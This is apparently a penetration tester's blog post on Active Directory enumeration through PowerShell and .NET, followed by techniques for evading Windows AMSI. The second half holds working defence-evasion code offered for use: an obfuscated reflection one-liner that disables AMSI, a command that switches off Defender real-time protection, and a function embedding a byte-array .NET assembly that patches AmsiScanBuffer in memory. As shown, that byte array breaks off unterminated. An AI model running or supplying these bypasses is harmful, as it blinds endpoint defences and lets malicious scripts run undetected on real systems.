Andrea Bruschi, Cyber Security Analyst

Domain enumeration, part 1

Published by Andy

Active Directory can be enumerated with native executables (C#) or with .NET classes. No elevated privileges are needed: any domain user can query the directory. From PowerShell, for example, the following two lines are enough:

$AD = [System.DirectoryServices.ActiveDirectory.Domain]
$AD::GetCurrentDomain()


(Source: https://itfordummies.net/2015/11/02/active-directory-trusts-powershell/)
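Taking the .NET approach a step further, here is an added example (mine, not code from the original post) that enumerates the current domain, its domain controllers, trusts and SID, and runs arbitrary LDAP queries through System.DirectoryServices.DirectorySearcher. It needs only a domain-joined, unprivileged session, with neither PowerView nor RSAT present. The function names and the sample description filter are my own choices.

```powershell
# Added example: AD enumeration with .NET / ADSI only (no PowerView, no RSAT).
# Works from an unprivileged domain user session; function names are my own.

function Get-DomainSummary {
    # Same object the post reads with $AD::GetCurrentDomain(), flattened into one record
    $domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
    [pscustomobject]@{
        Name        = $domain.Name
        Forest      = $domain.Forest.Name
        DomainMode  = $domain.DomainMode
        PdcEmulator = $domain.PdcRoleOwner.Name
        Controllers = @($domain.DomainControllers | ForEach-Object { $_.Name })
        # Trusts: direction says which way authentication flows, type says forest vs external
        Trusts      = @($domain.GetAllTrustRelationships() |
                        ForEach-Object { '{0} [{1}, {2}]' -f $_.TargetName, $_.TrustDirection, $_.TrustType })
    }
}

function Get-DomainSidFromAdsi {
    # The domain SID is the objectSid of the domain head; every RID-based SID in the domain
    # (e.g. RID 500 = built-in Administrator) is this value plus a suffix.
    $root       = [ADSI]'LDAP://RootDSE'
    $domainHead = [ADSI]"LDAP://$($root.defaultNamingContext)"
    $sidBytes   = $domainHead.Properties['objectSid'][0]
    (New-Object System.Security.Principal.SecurityIdentifier($sidBytes, 0)).Value
}

function Search-Ldap {
    # Minimal DirectorySearcher wrapper: any LDAP filter, selected attributes, paged results.
    param(
        [Parameter(Mandatory)][string]$Filter,
        [string[]]$Properties = @('samAccountName'),
        [string]$SearchBase            # e.g. 'LDAP://OU=Servers,DC=corp,DC=local'; default: whole domain
    )
    if (-not $SearchBase) {
        $SearchBase = "LDAP://$(([ADSI]'LDAP://RootDSE').defaultNamingContext)"
    }
    $searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchBase, $Filter, $Properties)
    $searcher.PageSize = 500           # without paging the DC caps a result set at 1000 entries
    foreach ($result in $searcher.FindAll()) {
        $record = [ordered]@{}
        foreach ($name in $Properties) {
            $values = @($result.Properties[$name.ToLower()])
            # multi-valued attributes (memberOf, servicePrincipalName) stay arrays, scalars are unwrapped
            $record[$name] = if ($values.Count -eq 1) { $values[0] } else { $values }
        }
        [pscustomobject]$record
    }
}

# Usage
Get-DomainSummary
Get-DomainSidFromAdsi
# Same question as Find-UserField -SearchField Description -SearchTerm "built", as a raw LDAP filter
Search-Ldap -Filter '(&(objectCategory=person)(objectClass=user)(description=*built*))' `
            -Properties samAccountName, description
# Rough equivalent of Get-NetUser: every user with the attributes the rest of this post looks at
Search-Ldap -Filter '(&(objectCategory=person)(objectClass=user))' `
            -Properties samAccountName, description, pwdLastSet, logonCount, badPwdCount
```

DirectorySearcher returns pwdLastSet as an Int64 FILETIME; convert it with [datetime]::FromFileTime() as the post does later for Get-ADUser. Everything here goes to the DC over LDAP (TCP 389), which is what PowerView also does under the hood.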

To speed up enumeration there are a couple of tools that automate the process: PowerView, and Microsoft's Active Directory module.

AMSI

AMSI stands for Antimalware Scan Interface and was introduced in Windows 10. It is an interface that applications and services can use to send "content" to the anti-malware provider installed on the system (e.g. Windows Defender). To do this, AMSI is hooked into, for example, Windows Script Host (WSH) and PowerShell: the content is captured at the point where the engine is about to execute it, i.e. after any string building or de-obfuscation has already happened, and is handed to the anti-malware solution before it runs. This is why obfuscating a script at the string level only defeats a signature, not the scanning point itself.

This is the list of all the Windows 10 components that implement AMSI:

- User Account Control (UAC): elevation of EXE, COM, MSI or ActiveX installs
- PowerShell: scripts, interactive use and dynamic code evaluation
- Windows Script Host: wscript.exe and cscript.exe
- JavaScript and VBScript
- Office VBA macros

Below is a representation of the AMSI architecture.

The point of this short introduction to AMSI is that, when PowerView or similar scripts are imported, there is a high probability that Windows Defender detects them. A simple way around this is PyFuscation, which obfuscates (renames) all of PowerView's functions, variables and parameters. Obviously you then need to keep track of the new function names to know which commands to run. Keep in mind that this only defeats static signatures on identifier names: behaviour-based detections still apply, and if script block logging is enabled the renamed code is recorded in full in event 4104.

A popular one-liner is the following (a string-obfuscated form of Matt Graeber's amsiInitFailed bypass). It uses reflection to set the non-public static field System.Management.Automation.AmsiUtils.amsiInitFailed to $true; the PowerShell engine then believes AMSI failed to initialise and stops submitting script content for scanning in that process. Defender has signatured this string in most of its forms, so expect it to be blocked as-is:

sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Another method, explained in detail, can be found here:

Bypass AMSI

Source

If you have administrator privileges you can run the following command, which turns off Defender's real-time protection (and with it the scanning behind AMSI). Note that the change is logged (Microsoft-Windows-Windows Defender/Operational, event ID 5001) and that on current Windows builds Tamper Protection blocks it:

Set-MpPreference -DisableRealtimeMonitoring $true

Yet another method is the following function; see the source for details. The byte array is a small .NET assembly (BypassAMSI.dll) that is loaded reflectively, without touching disk, and patches AmsiScanBuffer in amsi.dll inside the current process (the strings amsi.dll, AmsiScanBuffer, VirtualProtect and RtlMoveMemory are visible in the bytes below).

function Bypass-AMSI
{
    if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) {
        [Reflection.Assembly]::Load([byte[]]@(77, 90, 144, 0, 3, 0, 0, 0, 4, 0, 0, 0, 255, 255, 0, 0, 184, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0, 14, 31, 186, 14, 0, 180, 9, 205, 33, 184, 1, 76, 205, 33, 84, 104, 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111, 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46, 13, 13, 10, 36, 0, 0, 0, 0, 0, 0, 0, 80, 69, 0, 0, 76, 1, 3, 0, 162, 107, 61, 140, 0, 0, 0, 0, 0, 0, 0, 0, 224, 0, 34, 32, 11, 1, 48, 0, 0, 14, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 198, 44, 0, 0, 0, 32, 0, 0, 0, 64, 0, 0, 0, 0, 0, 16, 0, 32, 0, 0, 0, 2, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 3, 0, 96, 133, 0, 0, 16, 0, 0, 16, 0, 0, 0, 0, 16, 0, 0, 16, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 113, 44, 0, 0, 79, 0, 0, 0, 0, 64, 0, 0, 136, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 96, 0, 0, 12, 0, 0, 0, 212, 43, 0, 0, 56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 32, 0, 0, 72, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 46, 116, 101, 120, 116, 0, 0, 0, 212, 12, 0, 0, 0, 32, 0, 0, 0, 14, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 96, 46, 114, 115, 114, 99, 0, 0, 0, 136, 3, 0, 0, 0, 64, 0, 0, 0, 4, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 64, 46, 114, 101, 108, 111, 99, 0, 0, 12, 0, 0, 0, 0, 96, 0, 0, 0, 2, 0, 0, 0, 20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 165, 44, 0, 0, 0, 0, 0, 0, 72, 0, 0, 0, 2, 0, 5, 0, 16, 33, 0, 0, 196, 10, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0, 0, 19, 48, 4, 0, 170, 0, 0, 0, 1, 0, 0, 17, 114, 1, 0, 0, 112, 40, 2, 0, 0, 6, 10, 6, 126, 16, 0, 0, 10, 40, 17, 0, 0, 10, 44, 12, 114, 19, 0, 0, 112, 40, 18, 0, 0, 10, 23, 42, 6, 114, 107, 0, 0, 112, 40, 1, 0, 0, 6, 11, 7, 126, 16, 0, 0, 10, 40, 17, 0, 0, 10, 44, 12, 114, 137, 0, 0, 112, 40, 18, 0, 0, 10, 23, 42, 27, 106, 40, 19, 0, 0, 10, 12, 22, 13, 7, 8, 31, 64, 18, 3, 40, 3, 0, 0, 6, 45, 12, 114, 253, 0, 0, 112, 40, 18, 0, 0, 10, 23, 42, 25, 141, 22, 0, 0, 1, 37, 208, 1, 0, 0, 4, 40, 20, 0, 0, 10, 25, 40, 21, 0, 0, 10, 19, 4, 22, 17, 4, 25, 40, 22, 0, 0, 10, 7, 31, 27, 40, 23, 0, 0, 10, 17, 4, 25, 40, 4, 0, 0, 6, 114, 115, 1, 0, 112, 40, 18, 0, 0, 10, 22, 42, 30, 2, 40, 24, 0, 0, 10, 42, 0, 0, 66, 83, 74, 66, 1, 0, 1, 0, 0, 0, 0, 0, 12, 0, 0, 0, 118, 52, 46, 48, 46, 51, 48, 51, 49, 57, 0, 0, 0, 0, 5, 0, 108, 0, 0, 0, 28, 3, 0, 0, 35, 126, 0, 0, 136, 3, 0, 0, 0, 4, 0, 0, 35, 83, 116, 114, 105, 110, 103, 115, 0, 0, 0, 0, 136, 7, 0, 0, 196, 1, 0, 0, 35, 85, 83, 0, 76, 9, 0, 0, 16, 0, 0, 0, 35, 71, 85, 73, 68, 0, 0, 0, 92, 9, 0, 0, 104, 1, 0, 0, 35, 66, 108, 111, 98, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 1, 87, 149, 2, 52, 9, 2, 0, 0, 0, 250, 1, 51, 0, 22, 0, 0, 1, 0, 0, 0, 26, 0, 0, 0, 4, 0, 0, 0, 1, 0, 0, 0, 6, 0, 0, 0, 10, 0, 0, 0, 24, 0, 0, 0, 15, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 2, 0, 0, 0, 4, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 169, 2, 1, 0, 0, 0, 0, 0, 6, 0, 209, 1, 34, 3, 6, 0, 62, 2, 34, 3, 6, 0, 5, 1, 240, 2, 15, 0, 66, 3, 0, 0, 6, 0, 45, 1, 191, 2, 6, 0, 180, 1, 191, 2, 6, 0, 149, 1, 191, 2, 6, 0, 37, 2, 191, 2, 6, 0, 241, 1, 191, 2, 6, 0, 10, 2, 191, 2, 6, 0, 68, 1, 191, 2, 6, 0, 25, 1, 3, 3, 6, 0, 247, 0, 3, 3, 6, 0, 120, 1, 191, 2, 6, 0, 95, 1, 109, 2, 6, 0, 128, 3, 184, 2, 6, 0, 220, 0, 34, 3, 6, 0, 210, 0, 184, 2, 6, 0, 233, 2, 184, 2, 6, 0, 170, 0, 184, 2, 6, 0, 232, 2, 184, 2, 6, 0, 92, 2, 184, 2, 6, 0, 81, 3, 34, 3, 6, 0, 205, 3, 184, 2, 6, 0, 151, 0, 184, 2, 6, 0, 148, 2, 3, 3, 0, 0, 0, 0, 38, 0, 0, 0, 0, 0, 
1, 0, 1, 0, 1, 0, 16, 0, 125, 0, 96, 3, 65, 0, 1, 0, 1, 0, 0, 1, 0, 0, 47, 0, 0, 0, 65, 0, 1, 0, 7, 0, 19, 1, 0, 0, 10, 0, 0, 0, 73, 0, 2, 0, 7, 0, 51, 1, 78, 0, 90, 0, 0, 0, 0, 0, 128, 0, 150, 32, 103, 3, 94, 0, 1, 0, 0, 0, 0, 0, 128, 0, 150, 32, 216, 3, 100, 0, 3, 0, 0, 0, 0, 0, 128, 0, 150, 32, 150, 3, 105, 0, 4, 0, 0, 0, 0, 0, 128, 0, 145, 32, 231, 3, 114, 0, 8, 0, 80, 32, 0, 0, 0, 0, 150, 0, 143, 0, 121, 0, 11, 0, 6, 33, 0, 0, 0, 0, 134, 24, 226, 2, 6, 0, 11, 0, 0, 0, 1, 0, 178, 0, 0, 0, 2, 0, 186, 0, 0, 0, 1, 0, 195, 0, 0, 0, 1, 0, 118, 3, 0, 0, 2, 0, 97, 2, 0, 0, 3, 0, 165, 3, 2, 0, 4, 0, 135, 3, 0, 0, 1, 0, 190, 3, 0, 0, 2, 0, 139, 0, 0, 0, 3, 0, 104, 2, 9, 0, 226, 2, 1, 0, 17, 0, 226, 2, 6, 0, 25, 0, 226, 2, 10, 0, 41, 0, 226, 2, 16, 0, 49, 0, 226, 2, 16, 0, 57, 0, 226, 2, 16, 0, 65, 0, 226, 2, 16, 0, 73, 0, 226, 2, 16, 0, 81, 0, 226, 2, 16, 0, 89, 0, 226, 2, 16, 0, 97, 0, 226, 2, 21, 0, 105, 0, 226, 2, 16, 0, 113, 0, 226, 2, 16, 0, 121, 0, 226, 2, 16, 0, 137, 0, 226, 2, 6, 0, 153, 0, 221, 2, 34, 0, 153, 0, 242, 3, 37, 0, 161, 0, 200, 0, 43, 0, 169, 0, 178, 3, 48, 0, 185, 0, 195, 3, 53, 0, 209, 0, 135, 2, 61, 0, 209, 0, 211, 3, 66, 0, 153, 0, 209, 2, 75, 0, 129, 0, 226, 2, 6, 0, 46, 0, 11, 0, 125, 0, 46, 0, 19, 0, 134, 0, 46, 0, 27, 0, 165, 0, 46, 0, 35, 0, 174, 0, 46, 0, 43, 0, 190, 0, 46, 0, 51, 0, 190, 0, 46, 0, 59, 0, 190, 0, 46, 0, 67, 0, 174, 0, 46, 0, 75, 0, 196, 0, 46, 0, 83, 0, 190, 0, 46, 0, 91, 0, 190, 0, 46, 0, 99, 0, 220, 0, 46, 0, 107, 0, 6, 1, 46, 0, 115, 0, 19, 1, 99, 0, 123, 0, 97, 1, 1, 0, 3, 0, 0, 0, 4, 0, 26, 0, 1, 0, 156, 2, 0, 1, 3, 0, 103, 3, 1, 0, 0, 1, 5, 0, 216, 3, 1, 0, 0, 1, 7, 0, 150, 3, 1, 0, 0, 1, 9, 0, 228, 3, 2, 0, 204, 44, 0, 0, 1, 0, 4, 128, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 119, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 81, 0, 130, 0, 0, 0, 0, 0, 4, 0, 3, 0, 0, 0, 0, 0, 0, 107, 101, 114, 110, 101, 108, 51, 50, 0, 95, 95, 83, 116, 97, 116, 105, 99, 65, 114, 114, 97, 121, 73, 110, 105, 116, 84, 121, 112, 
101, 83, 105, 122, 101, 61, 51, 0, 60, 77, 111, 100, 117, 108, 101, 62, 0, 60, 80, 114, 105, 118, 97, 116, 101, 73, 109, 112, 108, 101, 109, 101, 110, 116, 97, 116, 105, 111, 110, 68, 101, 116, 97, 105, 108, 115, 62, 0, 53, 49, 67, 65, 70, 66, 52, 56, 49, 51, 57, 66, 48, 50, 69, 48, 54, 49, 68, 52, 57, 49, 57, 67, 53, 49, 55, 54, 54, 50, 49, 66, 70, 56, 55, 68, 65, 67, 69, 68, 0, 66, 121, 112, 97, 115, 115, 65, 77, 83, 73, 0, 109, 115, 99, 111, 114, 108, 105, 98, 0, 115, 114, 99, 0, 68, 105, 115, 97, 98, 108, 101, 0, 82, 117, 110, 116, 105, 109, 101, 70, 105, 101, 108, 100, 72, 97, 110, 100, 108, 101, 0, 67, 111, 110, 115, 111, 108, 101, 0, 104, 77, 111, 100, 117, 108, 101, 0, 112, 114, 111, 99, 78, 97, 109, 101, 0, 110, 97, 109, 101, 0, 87, 114, 105, 116, 101, 76, 105, 110, 101, 0, 86, 97, 108, 117, 101, 84, 121, 112, 101, 0, 67, 111, 109, 112, 105, 108, 101, 114, 71, 101, 110, 101, 114, 97, 116, 101, 100, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 71, 117, 105, 100, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 68, 101, 98, 117, 103, 103, 97, 98, 108, 101, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 67, 111, 109, 86, 105, 115, 105, 98, 108, 101, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 84, 105, 116, 108, 101, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 84, 114, 97, 100, 101, 109, 97, 114, 107, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 84, 97, 114, 103, 101, 116, 70, 114, 97, 109, 101, 119, 111, 114, 107, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 70, 105, 108, 101, 86, 101, 114, 115, 105, 111, 110, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 67, 111, 110, 102, 105, 103, 117, 114, 97, 116, 105, 111, 110, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 68, 101, 115, 99, 114, 105, 112, 116, 105, 111, 110, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 67, 111, 
109, 112, 105, 108, 97, 116, 105, 111, 110, 82, 101, 108, 97, 120, 97, 116, 105, 111, 110, 115, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 80, 114, 111, 100, 117, 99, 116, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 67, 111, 112, 121, 114, 105, 103, 104, 116, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 67, 111, 109, 112, 97, 110, 121, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 82, 117, 110, 116, 105, 109, 101, 67, 111, 109, 112, 97, 116, 105, 98, 105, 108, 105, 116, 121, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 66, 121, 116, 101, 0, 100, 119, 83, 105, 122, 101, 0, 115, 105, 122, 101, 0, 83, 121, 115, 116, 101, 109, 46, 82, 117, 110, 116, 105, 109, 101, 46, 86, 101, 114, 115, 105, 111, 110, 105, 110, 103, 0, 65, 108, 108, 111, 99, 72, 71, 108, 111, 98, 97, 108, 0, 77, 97, 114, 115, 104, 97, 108, 0, 75, 101, 114, 110, 101, 108, 51, 50, 46, 100, 108, 108, 0, 66, 121, 112, 97, 115, 115, 65, 77, 83, 73, 46, 100, 108, 108, 0, 83, 121, 115, 116, 101, 109, 0, 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 0, 111, 112, 95, 65, 100, 100, 105, 116, 105, 111, 110, 0, 90, 101, 114, 111, 0, 46, 99, 116, 111, 114, 0, 85, 73, 110, 116, 80, 116, 114, 0, 83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 0, 83, 121, 115, 116, 101, 109, 46, 82, 117, 110, 116, 105, 109, 101, 46, 73, 110, 116, 101, 114, 111, 112, 83, 101, 114, 118, 105, 99, 101, 115, 0, 83, 121, 115, 116, 101, 109, 46, 82, 117, 110, 116, 105, 109, 101, 46, 67, 111, 109, 112, 105, 108, 101, 114, 83, 101, 114, 118, 105, 99, 101, 115, 0, 68, 101, 98, 117, 103, 103, 105, 110, 103, 77, 111, 100, 101, 115, 0, 82, 117, 110, 116, 105, 109, 101, 72, 101, 108, 112, 101, 114, 115, 0, 66, 121, 112, 97, 115, 115, 0, 71, 101, 116, 80, 114, 111, 99, 65, 100, 100, 114, 101, 115, 115, 0, 108, 112, 65, 100, 100, 114, 101, 115, 115, 0, 79, 98, 
106, 101, 99, 116, 0, 108, 112, 102, 108, 79, 108, 100, 80, 114, 111, 116, 101, 99, 116, 0, 86, 105, 114, 116, 117, 97, 108, 80, 114, 111, 116, 101, 99, 116, 0, 102, 108, 78, 101, 119, 80, 114, 111, 116, 101, 99, 116, 0, 111, 112, 95, 69, 120, 112, 108, 105, 99, 105, 116, 0, 100, 101, 115, 116, 0, 73, 110, 105, 116, 105, 97, 108, 105, 122, 101, 65, 114, 114, 97, 121, 0, 67, 111, 112, 121, 0, 76, 111, 97, 100, 76, 105, 98, 114, 97, 114, 121, 0, 82, 116, 108, 77, 111, 118, 101, 77, 101, 109, 111, 114, 121, 0, 111, 112, 95, 69, 113, 117, 97, 108, 105, 116, 121, 0, 0, 0, 0, 17, 97, 0, 109, 0, 115, 0, 105, 0, 46, 0, 100, 0, 108, 0, 108, 0, 0, 87, 69, 0, 82, 0, 82, 0, 79, 0, 82, 0, 58, 0, 32, 0, 67, 0, 111, 0, 117, 0, 108, 0, 100, 0, 32, 0, 110, 0, 111, 0, 116, 0, 32, 0, 114, 0, 101, 0, 116, 0, 114, 0, 105, 0, 101, 0, 118, 0, 101, 0, 32, 0, 97, 0, 109, 0, 115, 0, 105, 0, 46, 0, 100, 0, 108, 0, 108, 0, 32, 0, 112, 0, 111, 0, 105, 0, 110, 0, 116, 0, 101, 0, 114, 0, 46, 0, 0, 29, 65, 0, 109, 0, 115, 0, 105, 0, 83, 0, 99, 0, 97, 0, 110, 0, 66, 0, 117, 0, 102, 0, 102, 0, 101, 0, 114, 0, 0, 115, 69, 0, 82, 0, 82, 0, 79, 0, 82, 0, 58, 0, 32, 0, 67, 0, 111, 0, 117, 0, 108, 0, 100, 0, 32, 0, 110, 0, 111, 0, 116, 0, 32, 0, 114, 0, 101, 0, 116, 0, 114, 0, 105, 0, 101, 0, 118, 0, 101, 0, 32, 0, 65, 0, 109, 0, 115, 0, 105, 0, 83, 0, 99, 0, 97, 0, 110, 0, 66, 0, 117, 0, 102, 0, 102, 0, 101, 0, 114, 0, 32, 0, 102, 0, 117, 0, 110, 0, 99, 0, 116, 0, 105, 0, 111, 0, 110, 0, 32, 0, 112, 0, 111, 0, 105, 0, 110, 0, 116, 0, 101, 0, 114, 0, 0, 117, 69, 0, 82, 0, 82, 0, 79, 0, 82, 0, 58, 0, 32, 0, 67, 0, 111, 0, 117, 0, 108, 0, 100, 0, 32, 0, 110, 0, 111, 0, 116, 0, 32, 0, 99, 0, 104, 0, 97, 0, 110, 0, 103, 0, 101, 0, 32, 0, 65, 0, 109, 0, 115, 0, 105, 0, 83, 0, 99, 0, 97, 0, 110, 0, 66, 0, 117, 0, 102, 0, 102, 0, 101, 0, 114, 0, 32, 0, 109, 0, 101, 0, 109, 0, 111, 0, 114, 0, 121, 0, 32, 0, 112, 0, 101, 0, 114, 0, 109, 0, 105, 0, 115, 0, 115, 0, 105, 0, 111, 0, 110, 0, 115, 0, 33, 0, 0, 77, 65, 
0, 109, 0, 115, 0, 105, 0, 83, 0, 99, 0, 97, 0, 110, 0, 66, 0, 117, 0, 102, 0, 102, 0, 101, 0, 114, 0, 32, 0, 112, 0, 97, 0, 116, 0, 99, 0, 104, 0, 32, 0, 104, 0, 97, 0, 115, 0, 32, 0, 98, 0, 101, 0, 101, 0, 110, 0, 32, 0, 97, 0, 112, 0, 112, 0, 108, 0, 105, 0, 101, 0, 100, 0, 46, 0, 0, 0, 0, 0, 77, 203, 161, 57, 40, 124, 239, 68, 156, 240, 131, 50, 130, 195, 248, 87, 0, 4, 32, 1, 1, 8, 3, 32, 0, 1, 5, 32, 1, 1, 17, 17, 4, 32, 1, 1, 14, 4, 32, 1, 1, 2, 7, 7, 5, 24, 24, 25, 9, 24, 2, 6, 24, 5, 0, 2, 2, 24, 24, 4, 0, 1, 1, 14, 4, 0, 1, 25, 11, 7, 0, 2, 1, 18, 97, 17, 101, 4, 0, 1, 24, 8, 8, 0, 4, 1, 29, 5, 8, 24, 8, 5, 0, 2, 24, 24, 8, 8, 183, 122, 92, 86, 25, 52, 224, 137, 3, 6, 17, 16, 5, 0, 2, 24, 24, 14, 4, 0, 1, 24, 14, 8, 0, 4, 2, 24, 25, 9, 16, 9, 6, 0, 3, 1, 24, 24, 8, 3, 0, 0, 8, 8, 1, 0, 8, 0, 0, 0, 0, 0, 30, 1, 0, 1, 0, 84, 2, 22, 87, 114, 97, 112, 78, 111, 110, 69, 120, 99, 101, 112, 116, 105, 111, 110, 84, 104, 114, 111, 119, 115, 1, 8, 1, 0, 2, 0, 0, 0, 0, 0, 15, 1, 0, 10, 66, 121, 112, 97, 115, 115, 65, 77, 83, 73, 0, 0, 5, 1, 0, 0, 0, 0, 23, 1, 0, 18, 67, 111, 112, 121, 114, 105, 103, 104, 116, 32, 194, 169, 32, 32, 50, 48, 49, 56, 0, 0, 41, 1, 0, 36, 56, 99, 97, 49, 52, 99, 52, 57, 45, 54, 52, 52, 98, 45, 52, 48, 99, 102, 45, 98, 49, 99, 55, 45, 97, 53, 98, 100, 97, 101, 98, 48, 98, 50, 99, 97, 0, 0, 12, 1, 0, 7, 49, 46, 48, 46, 48, 46, 48, 0, 0, 77, 1, 0, 28, 46, 78, 69, 84, 70, 114, 97, 109, 101, 119, 111, 114, 107, 44, 86, 101, 114, 115, 105, 111, 110, 61, 118, 52, 46, 53, 46, 50, 1, 0, 84, 14, 20, 70, 114, 97, 109, 101, 119, 111, 114, 107, 68, 105, 115, 112, 108, 97, 121, 78, 97, 109, 101, 20, 46, 78, 69, 84, 32, 70, 114, 97, 109, 101, 119, 111, 114, 107, 32, 52, 46, 53, 46, 50, 4, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 221, 193, 71, 222, 0, 0, 0, 0, 2, 0, 0, 0, 101, 0, 0, 0, 12, 44, 0, 0, 12, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 82, 83, 68, 83, 105, 207, 113, 241, 18, 122, 72, 71, 173, 244, 95, 
170, 153, 86, 158, 210, 1, 0, 0, 0, 67, 58, 92, 85, 115, 101, 114, 115, 92, 97, 110, 100, 114, 101, 92, 115, 111, 117, 114, 99, 101, 92, 114, 101, 112, 111, 115, 92, 66, 121, 112, 97, 115, 115, 65, 77, 83, 73, 92, 66, 121, 112, 97, 115, 115, 65, 77, 83, 73, 92, 111, 98, 106, 92, 82, 101, 108, 101, 97, 115, 101, 92, 66, 121, 112, 97, 115, 115, 65, 77, 83, 73, 46, 112, 100, 98, 0, 153, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 179, 44, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 165, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 95, 67, 111, 114, 68, 108, 108, 77, 97, 105, 110, 0, 109, 115, 99, 111, 114, 101, 101, 46, 100, 108, 108, 0, 0, 0, 0, 0, 0, 0, 0, 255, 37, 0, 32, 0, 16, 49, 255, 144, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 